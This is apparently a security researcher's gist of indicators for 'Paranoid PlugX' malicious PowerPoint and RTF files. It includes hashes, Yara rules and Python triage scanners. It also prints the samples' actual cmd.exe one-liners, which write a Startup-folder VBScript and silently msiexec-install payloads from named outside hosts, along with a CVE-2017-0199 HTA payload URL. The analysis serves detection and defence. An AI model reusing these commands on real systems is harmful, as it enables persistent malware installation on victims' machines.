@edeca
Last active September 14, 2017 05:38
List of additional Paranoid PlugX indicators

Paranoid PlugX

This gist contains brief details of additional "Paranoid PlugX" files, likely associated with a sophisticated attacker. NCC Group monitors for a number of OOXML and RTF techniques that our red team has been using since September 2016; that monitoring uncovered multiple malicious documents from around August 2017.

For the original Paranoid PlugX article, please see: https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/ (h/t Palo and @tlansec).

Documents

A few documents use 203.248.116.182 to retrieve further malicious content.

OOXML

Two PowerPoint presentations abuse external hyperlink relationships in the OOXML package: a hyperlink Relationship with TargetMode="External" whose Target is a command line instead of a URL. The visible slide content simply says:

Please Enable Your Adobe Flash Player Settings...

Both documents attempt to start cmd.exe, pulling an additional payload from either youthservicesballarat.com.au or 203.248.116.182. Each hyperlink target is a cmd.exe one-liner: it echoes a two-line VBScript into the user's Startup folder (so the script also runs at every subsequent logon), then executes it. The script calls msiexec to silently install a package fetched over HTTP, with a filename chosen to look like an image (.jpg, .gif or .bmp).

The relevant part of each document, after basic deobfuscation, is shown below. The first document's rId3 reads "CrateObject" as listed; the other relationships spell it correctly.

<Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo sET WS = CrateObject("wScript.ShEll")  > %AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;echo ws.run "cmd.exe /c msiexec /q /i http://youthservicesballarat.com.au/images/kubrickhead.jpg",vbhide>>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs " TargetMode="External"/>
<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo Set ws = CreateObject("Wscript.Shell")  > %AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;echo ws.run "cmd.exe /c msiexec.exe /q /i http://203.248.116.182/images/a00.gif",vbhide>>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs" TargetMode="External"/>
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
<Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo Set ws = CreateObject("Wscript.Shell")>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;echo ws.run "cmd.exe /c msiexec /q /i http://youthservicesballarat.com.au/images/kubrickhead.jpg",vbhide>>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Programs.vbs " TargetMode="External"/>

Second document:

<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe /c echo Set ws = CreateObject("Wscript.Shell")>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Thumbs.vbs&amp;echo ws.run "cmd.exe /c msiexec /q /i http://203.248.116.182/images/Thumbs.bmp",vbhide>>%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Thumbs.vbs&amp;%AppData%/Microsoft/Windows/"Start Menu"/Programs/Startup/Thumbs.vbs " TargetMode="External"/>

RTF

Two RTF files abuse CVE-2017-0199, the Office OLE2Link flaw in which a linked object set to update when the document opens fetches and executes a remote HTA. The document content is in Japanese and relates to ANA, an airline. The embedded OLE content is identical in both, but one version also carries the HTA name in the RTF \objclass element.

The payload URL for both is: http://203.248.116.182/images/opt.hta
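As an added example, not code from the gist or from the samples themselves, here is a small Python triage script for RTF files of the kind described above. It checks for an \object group carrying \objupdate (the control word that makes Word refresh the link on open) and \objautlink, reads the \objclass name, hex-decodes the \*\objdata payload and pulls any ASCII or UTF-16LE URL out of it. The RTF it scans is constructed inline around the opt.hta URL from this page with a simplified stand-in for the OLE2Link object, so its bytes are not those of the real samples; the control-word checks, the regex names and the "suspicious" verdict logic are this example's own assumptions.

```python
"""Triage an RTF file for a CVE-2017-0199 style auto-updating linked object.

Added example, not code from the gist. The RTF scanned in main() is built
inline around the opt.hta URL from this page with a simplified stand-in for
the OLE2Link object, so its bytes are not those of the real samples. The
control-word checks, regex names and the 'suspicious' verdict are this
example's own choices.
"""
import re

OBJUPDATE = re.compile(r"\\objupdate(?![a-z])")     # refresh the link on open
OBJAUTLINK = re.compile(r"\\objautlink(?![a-z])")   # automatic link object
OBJCLASS = re.compile(r"\\\*\\objclass\s+([^}]*)\}")
OBJDATA = re.compile(r"\\\*\\objdata\s*([0-9a-fA-F\s]+)")  # hex, may be line-wrapped

ASCII_URL = re.compile(rb"https?://[\x21-\x7e]+")
# The same thing with a NUL after every character, i.e. UTF-16LE, which is
# how the URL moniker inside the linked object stores its target.
UTF16_URL = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00)+")


def extract_urls(blob: bytes) -> list:
    urls = [m.decode("ascii") for m in ASCII_URL.findall(blob)]
    urls += [m.decode("utf-16-le") for m in UTF16_URL.findall(blob)]
    return urls


def decode_objdata(hexdata: str) -> bytes:
    """Strip the whitespace RTF writers insert and hex-decode the object."""
    raw = re.sub(r"\s+", "", hexdata)
    if len(raw) % 2:           # tolerate a truncated trailing nibble
        raw = raw[:-1]
    return bytes.fromhex(raw)


def scan_rtf(text: str) -> dict:
    result = {
        "objupdate": bool(OBJUPDATE.search(text)),
        "objautlink": bool(OBJAUTLINK.search(text)),
        "objclass": None,
        "urls": [],
    }
    m = OBJCLASS.search(text)
    if m:
        result["objclass"] = m.group(1).strip()
    for m in OBJDATA.finditer(text):
        result["urls"].extend(extract_urls(decode_objdata(m.group(1))))
    # Verdict (this example's own rule): a link object that refreshes itself
    # on open and either carries a URL or names the HTA handler matches the
    # pattern described on this page.
    result["suspicious"] = result["objupdate"] and (
        bool(result["urls"]) or (result["objclass"] or "").lower() == "htafile")
    return result


def build_sample() -> str:
    payload = "http://203.248.116.182/images/opt.hta"
    # Constructed: an OLE1-style header and "OLE2Link" class name followed by
    # the UTF-16LE URL. A real object wraps the URL moniker in further OLE
    # structures that this stand-in omits.
    blob = (b"\x01\x05\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00OLE2Link\x00"
            + b"\x00" * 16 + payload.encode("utf-16-le") + b"\x00\x00")
    hexdata = blob.hex()
    # RTF writers wrap hex data across lines; do the same so the scanner is
    # shown tolerating it.
    wrapped = "\n".join(hexdata[i:i + 64] for i in range(0, len(hexdata), 64))
    return ("{\\rtf1\\ansi{\\object\\objautlink\\objupdate\\objw100\\objh100"
            "{\\*\\objclass htafile}{\\*\\objdata " + wrapped + "}}}")


if __name__ == "__main__":
    verdict = scan_rtf(build_sample())
    for key, value in verdict.items():
        print("%-11s %s" % (key, value))
```

For real samples, the hex in \objdata is an OLE1 container that can wrap a full compound document; oletools' rtfobj will extract and parse that structure properly, whereas the string search above is only a quick first pass for the URL and the update flags.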

Hashes (SHA-256)

  • b26da51a70618b68a479e21bce499c20d4b280d7c79aa6b054da82c747ccfba1 - OOXML, PowerPoint presentation, abuses external references to download payload from 203.248.116.182 and youthservicesballarat.com.au
  • e7931270a89035125e6e6655c04fee00798c4c2d15846947e41df6bba36c75ae - OOXML, PowerPoint presentation, abuses external references to download payload from 203.248.116.182
  • 9704d9f8e1162f8cb367f1b49bf95d9c117e2eb1a7dbb98e3cd01a5c0361c889 - RTF, uses CVE-2017-0199 to download payload HTA from 203.248.116.182
  • 5c7b319d66d11f6a579bcf24a099e1788f6981a9aad8ca5cb1440f72a4366ea2 - RTF, uses CVE-2017-0199 to download payload HTA from 203.248.116.182
  • ea13ef8cb5f227080ebf65daa6644f66807aa8f06dce2155d40de556367221ee - MSIL (.Net) executable, first stage
  • fabcee5f4bab02700375db8a6b1e6a04372f19a4af98d2652ddcc15915374e02 - MSIL (.Net) executable, first stage
  • a3e8ecf21d2a8046d385160ca7e291390e3c962a7107b06d338c357002d2c2d9 - MSIL (.Net) executable, first stage
  • 104198af709201ba99e41691ca5f2b7025758660be51c7f425fdf1968fde2580 - MSIL (.Net) executable, first stage
  • 0d3b7f04bb3b421f89e0b305f206f688f2c87b47ce341cdb87422c8978f2a869 - MSIL (.Net) executable, first stage

Yara rule

The following Yara rules can help detect abuse of OOXML external links. Note that external relationships are a legitimate feature of Office (Word, PowerPoint and Excel all use them) and many non-malicious documents contain them, so treat a hit as a triage lead rather than a verdict.

Please also note there are lots of other executables which can run external code; cmd, powershell and regsvr32 are listed as obvious examples. A complete list is beyond the scope of this gist :)

rule exploit_Office_ExternalLinks : no_vt {
  meta:
    author = "David Cannings"
    description = "Generic rule to detect OOXML documents with potential RCE"
    
  strings:
    // Note: As with all OOXML documents the PKZIP container needs
    //       expanding before this will hit.
    $str01 = "relationships/hyperlink" wide ascii nocase
    $str02 = /TargetMode=["']?External/ wide ascii nocase
  
    // No backreferences in Yara regular expressions, so cover a 
    // few edge cases with multiple rules.
  
    // Catch any references to suspicious filetypes
    // See: https://support.microsoft.com/en-us/kb/291369
    $target_01 = /Target=["']?[a-z0-9_.-]{1,32}\.(exe|dll|msi|cab|ps1|inf|sct|ws|cpl|vb|bat|lnk|reg|scr|url)/ wide ascii nocase
  
  condition:
    all of ($str*) and any of ($target*)
}

rule exploit_Office_ExternalLinks_Suspicious {
  meta:
    author = "David Cannings"
    description = "Generic rule to detect OOXML documents whose external hyperlink target names an interpreter without a file extension"
    
  strings:
    // Note: As with all OOXML documents the PKZIP container needs
    //       expanding before this will hit.
    $str01 = "relationships/hyperlink" wide ascii nocase
    $str02 = /TargetMode=["']?External/ wide ascii nocase
    
    // Catch references that lack the file extension
    $target_01 = /Target=["']?(cmd|powershell|ftp[^:]|regsvr)/ wide ascii nocase
  
  condition:
    all of ($str*) and any of ($target*)
}
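As an added example (not code from the gist), the following Python scanner does in code what the two Yara rules above do on an expanded container, and ties back to the OOXML section earlier on this page: it opens the OOXML zip itself, reads every .rels part, and flags hyperlink relationships with TargetMode="External" whose target starts with an interpreter or a file name with a code-running extension rather than a URL. The archive it scans is constructed here from the rId2 relationship quoted in the OOXML section, with the quotes and ampersands escaped as they are stored on disk; the part layout, the pattern lists and the function names are this example's own.

```python
"""Scan an OOXML container for external hyperlink relationships whose
target is a command rather than a URL.

Added example, not code from the gist. The container scanned in main() is
constructed below from the rId2 relationship quoted in the OOXML section;
the file layout, pattern lists and function names are this example's own.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
HYPERLINK = ("http://schemas.openxmlformats.org/officeDocument/2006/"
             "relationships/hyperlink")
SLIDE_LAYOUT = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/slideLayout")

# Same two heuristics as the Yara rules: a bare file name with a code-running
# extension, or a well-known interpreter named without an extension. The
# interpreter list is deliberately short, as in the gist.
RUNS_CODE_EXT = re.compile(
    r"^[a-z0-9_.-]{1,32}\.(exe|dll|msi|cab|ps1|inf|sct|ws|cpl|vb|bat|lnk|reg|scr|url)\b",
    re.IGNORECASE)
INTERPRETER = re.compile(
    r"^(cmd|powershell|mshta|msiexec|regsvr32|rundll32|wscript|cscript)\b",
    re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"'<>]+", re.IGNORECASE)


def scan_rels(xml_bytes: bytes) -> list:
    """Return one finding per suspicious external hyperlink in a .rels part."""
    findings = []
    root = ET.fromstring(xml_bytes)
    for rel in root.iter("{%s}Relationship" % RELS_NS):
        if rel.get("TargetMode", "Internal") != "External":
            continue    # internal parts (slide layouts, media) are normal
        if rel.get("Type") != HYPERLINK:
            continue
        target = rel.get("Target", "")
        if INTERPRETER.match(target) or RUNS_CODE_EXT.match(target):
            findings.append({
                "id": rel.get("Id"),
                "target": target,
                # URLs embedded in the command line are the network IOCs.
                "urls": URL.findall(target),
            })
    return findings


def scan_ooxml(blob: bytes) -> dict:
    """Expand the PKZIP container and scan every .rels part inside it."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(".rels"):
                hits = scan_rels(zf.read(name))
                if hits:
                    results[name] = hits
    return results


# Constructed sample: the rId2 relationship from the first document, with the
# quotes and ampersands escaped as they are stored on disk (the listing in the
# gist shows them unescaped). rId1 and rId3 are benign controls.
SAMPLE_TARGET = (
    "cmd.exe /c echo Set ws = CreateObject(&quot;Wscript.Shell&quot;)  > "
    "%AppData%/Microsoft/Windows/&quot;Start Menu&quot;/Programs/Startup/Programs.vbs"
    "&amp;echo ws.run &quot;cmd.exe /c msiexec.exe /q /i "
    "http://203.248.116.182/images/a00.gif&quot;,vbhide"
    ">>%AppData%/Microsoft/Windows/&quot;Start Menu&quot;/Programs/Startup/Programs.vbs"
    "&amp;%AppData%/Microsoft/Windows/&quot;Start Menu&quot;/Programs/Startup/Programs.vbs"
)


def build_sample() -> bytes:
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s" Target="../slideLayouts/slideLayout1.xml"/>'
        '<Relationship Id="rId2" Type="%s" Target="%s" TargetMode="External"/>'
        '<Relationship Id="rId3" Type="%s" Target="https://example.com/" TargetMode="External"/>'
        '</Relationships>'
    ) % (RELS_NS, SLIDE_LAYOUT, HYPERLINK, SAMPLE_TARGET, HYPERLINK)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # minimal stand-in
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    for part, hits in scan_ooxml(build_sample()).items():
        for hit in hits:
            print(part, hit["id"], hit["urls"])
            print("   ", hit["target"][:80], "...")
```

Two practical notes. The Yara rules need the archive expanded before they hit; this scanner does the expansion itself, so it can run over a directory of raw .pptx/.docx files. And a bare ">" is legal inside an XML attribute value, so the on-disk target only differs from the deobfuscated listing above in its &quot; and &amp; escapes, which the XML parser undoes before the patterns are applied.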